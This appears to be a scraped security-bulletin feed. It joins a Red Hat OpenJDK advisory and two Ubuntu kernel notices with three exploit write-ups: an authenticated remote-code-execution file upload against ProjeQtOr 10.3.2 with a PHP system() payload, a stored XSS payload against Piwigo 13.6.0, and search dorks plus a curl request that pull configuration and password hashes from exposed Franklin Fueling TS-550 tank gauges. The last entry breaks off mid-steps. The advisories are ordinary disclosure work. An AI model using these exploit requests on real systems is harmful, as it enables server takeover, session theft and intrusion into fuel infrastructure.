Red Hat Security Advisory 2023-1899-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-11-openjdk security update  
Advisory ID:       RHSA-2023:1899-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1899  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
java-11-openjdk-11.0.19.0.7-1.el9_0.src.rpm

aarch64:  
java-11-openjdk-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el9_0.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el9_0.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el9_0.s390x.rpm

x86_64:  
java-11-openjdk-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el9_0.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el9_0.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el9_0.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el9_0.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el9_0.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEDAWtzjgjWX9erEAQh2+BAAg96Nob467z9WoHbfejGkA/fuVXGyT6Im  
e17a1faLlAl73a3134YcVRZ/Zwa3EQAu1wxBPGbMEYWA+llWNcHZQHwJ7WuL+pav  
mpJQoQ5o/qZPsjTmSAuBaMKYq+Ls048C8lN1COQhuNxcHtfbNA8elX7CeFRnQE7D  
6ghWTvLKe4vKb/3/e0Kb8emsc+1t63SRwNESHp92BpnLF3Bswk4HJai+WmoIHvav  
HFyyeHn1dCKzRuCKlyNY1WaAaed/gHcdwzRz9OCAPZxAP7qvSXiFOnjWZ6dvmFY4  
+EOERAeGcfsdH5Hm4UPfp/vYGUxlWR4vP6izPCDz1jr+WYb6xmOwLlq1SZObKK+7  
9/jrNSxrcnzhoWes2ZemrboogUioJypuvs5HZZwOu76GFz4JAdAJGowoiWZKNcFq  
fceS4aJwPfElKtgUL9k7RfCNhtD+VRGI32AwMFcRXkTSMCwslSgMVrgAoT8lqohq  
BwPBrnJVEOIhflW4Ow2et7RogmkQOvV19nGFVTsDPW5pC3rbYayU0egE2Nk5oAj/  
mjkxtUTcMRrdiYicoEVCLwm6LdfBHob2vdsA0JP/BetwV4NGvsAD+wPjWNbJbJpW  
Nc70Js0sK4EVgV8YstQS4vSAlgo1TmSenb77em0wRThCxbwVMjcX2kRYG5jIfegL  
4ljjScuTZ5w=  
=7/ih  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1899-01

Ubuntu Security Notice 6032-1 - Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service. Gerald Lee discovered that the USB Gadget file system implementation in the Linux kernel contained a race condition, leading to a use-after-free vulnerability in some situations. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6032-1  
April 19, 2023

linux-oem-6.0 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-oem-6.0: Linux kernel for OEM systems

Details:

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Gerald Lee discovered that the USB Gadget file system implementation in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability in some situations. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-4382)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

It was discovered that the file system writeback functionality in the Linux  
kernel contained a user-after-free vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2023-26605)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2023-26607)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-6.0.0-1014-oem      6.0.0-1014.14  
   linux-image-oem-22.04b          6.0.0.1014.14

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6032-1  
   CVE-2022-36280, CVE-2022-4382, CVE-2023-1074, CVE-2023-1118,  
   CVE-2023-23559, CVE-2023-26605, CVE-2023-26607

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-oem-6.0/6.0.0-1014.14

Ubuntu Security Notice USN-6032-1

ProjeQtOr Project Management System version 10.3.2 suffers from a remote shell upload vulnerability.

Exploit Title: ProjeQtOr Project Management System 10.3.2   -Remote Code Execution (RCE)  
Application: ProjeQtOr Project Management System  
Version: 10.3.2  
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload  
Technology: PHP  
Vendor URL: https://www.projeqtor.org  
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download  
Date of found: 19.04.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
Possible including php file with phar extension while uploading image. Rce is triggered when we visit again

Payload:<?php echo system("id"); ?>

poc request:

POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1  
Host: localhost  
Content-Length: 1177  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Accept: application/json  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
sec-ch-ua-platform: "Linux"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/projeqtor/view/main.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic  
Connection: close

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"  
Content-Type: application/octet-stream

<?php echo system("id"); ?>

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentId"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentRefType"

User  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentRefId"

1  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentType"

file  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10485760  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentLink"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentDescription"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentPrivacy"

1  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="uploadType"

html5  
------WebKitFormBoundaryY0bpJaQzcvQberWR--

visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar

ProjeQtOr Project Management System 10.3.2 Shell Upload

Ubuntu Security Notice 6031-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the Integrity Measurement Architecture implementation in the Linux kernel did not properly enforce policy in certain conditions. A privileged attacker could use this to bypass Kernel lockdown restrictions.

==========================================================================  
Ubuntu Security Notice USN-6031-1  
April 19, 2023

linux-oem-5.17 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-oem-5.17: Linux kernel for OEM systems

Details:

It was discovered that the Traffic-Control Index (TCINDEX) implementation  
in the Linux kernel contained a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-1281)

It was discovered that the Integrity Measurement Architecture (IMA)  
implementation in the Linux kernel did not properly enforce policy in  
certain conditions. A privileged attacker could use this to bypass Kernel  
lockdown restrictions. (CVE-2022-21505)

It was discovered that the infrared transceiver USB driver did not properly  
handle USB control messages. A local attacker with physical access could  
plug in a specially crafted USB device to cause a denial of service (memory  
exhaustion). (CVE-2022-3903)

It was discovered that a race condition existed in the SMSC UFX USB driver  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41849)

Gerald Lee discovered that the USB Gadget file system implementation in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability in some situations. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-4382)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

Mingi Cho discovered that the netfilter subsystem in the Linux kernel did  
not properly initialize a data structure, leading to a null pointer  
dereference vulnerability. An attacker could use this to cause a denial of  
service (system crash). (CVE-2023-1095)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2023-26607)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.17.0-1030-oem     5.17.0-1030.31  
   linux-image-oem-22.04           5.17.0.1030.28  
   linux-image-oem-22.04a          5.17.0.1030.28

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6031-1  
   CVE-2022-21505, CVE-2022-3903, CVE-2022-41849, CVE-2022-4382,  
   CVE-2023-1074, CVE-2023-1095, CVE-2023-1118, CVE-2023-1281,  
   CVE-2023-23559, CVE-2023-26607

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-oem-5.17/5.17.0-1030.31

Ubuntu Security Notice USN-6031-1

Piwigo version 13.6.0 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)Application: PiwigoVersion: 13.6.0 Bugs:  Stored XSSTechnology: PHPVendor URL: https://piwigo.org/Software Link: https://piwigo.org/get-piwigoDate of found: 18.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image)payload: <img%20src=x%20onerror=alert(4)>POST /piwigo/admin.php?page=photo-9 HTTP/1.1Host: localhostContent-Length: 159Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/piwigo/admin.php?page=photo-9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380feConnection: closename=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings

Piwigo 13.6.0 Cross Site Scripting

Franklin Fueling Systems TS-550 suffers from a password hash disclosure vulnerability.

# Exploit Title: Franklin Fueling Systems TS-550 - Default Password  
# Date: 4/16/2023  
# Exploit Author: parsa rezaie khiabanloo  
# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)  
# Version: TS-550  
# Tested on: Linux/Android(termux)

Step 1 : attacker can using these dorks and access to find the panel

inurl:"relay_status.html"

inurl:"fms_compliance.html"

inurl:"fms_alarms.html"

inurl:"system_status.html"

inurl:"system_reports.html'

inurl:"tank_status.html"

inurl:"sensor_status.html"

inurl:"tank_control.html"

inurl:"fms_reports.html"

inurl:"correction_table.html"

Step 2 : attacker can send request 

curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi

Step 3 : if get response that show like this 

